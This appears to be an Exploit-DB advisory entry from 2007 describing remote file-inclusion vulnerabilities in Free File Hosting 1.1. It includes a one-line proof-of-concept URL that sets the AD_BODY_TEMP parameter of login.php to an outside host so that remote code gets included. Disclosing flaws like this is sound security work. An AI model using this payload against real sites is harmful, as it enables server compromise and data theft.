Free File Hosting System 1.1 - 'login.php?AD_BODY_TEMP' Remote File Inclusion

EDB-ID:

29773


Author:

IbnuSina

Type:

webapps


Platform:

PHP

Date:

2007-03-24


source: https://www.securityfocus.com/bid/23118/info
 
Free File Hosting is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
 
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
 
Version 1.1 is vulnerable to these issues.
 
This BID was incorrectly reporting Free File Upload script as the affected package. Free File Upload script is the demo version of the Free File Hosting script.
 
This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. 

http://www.example.com/login.php?AD_BODY_TEMP=http://www.example2.com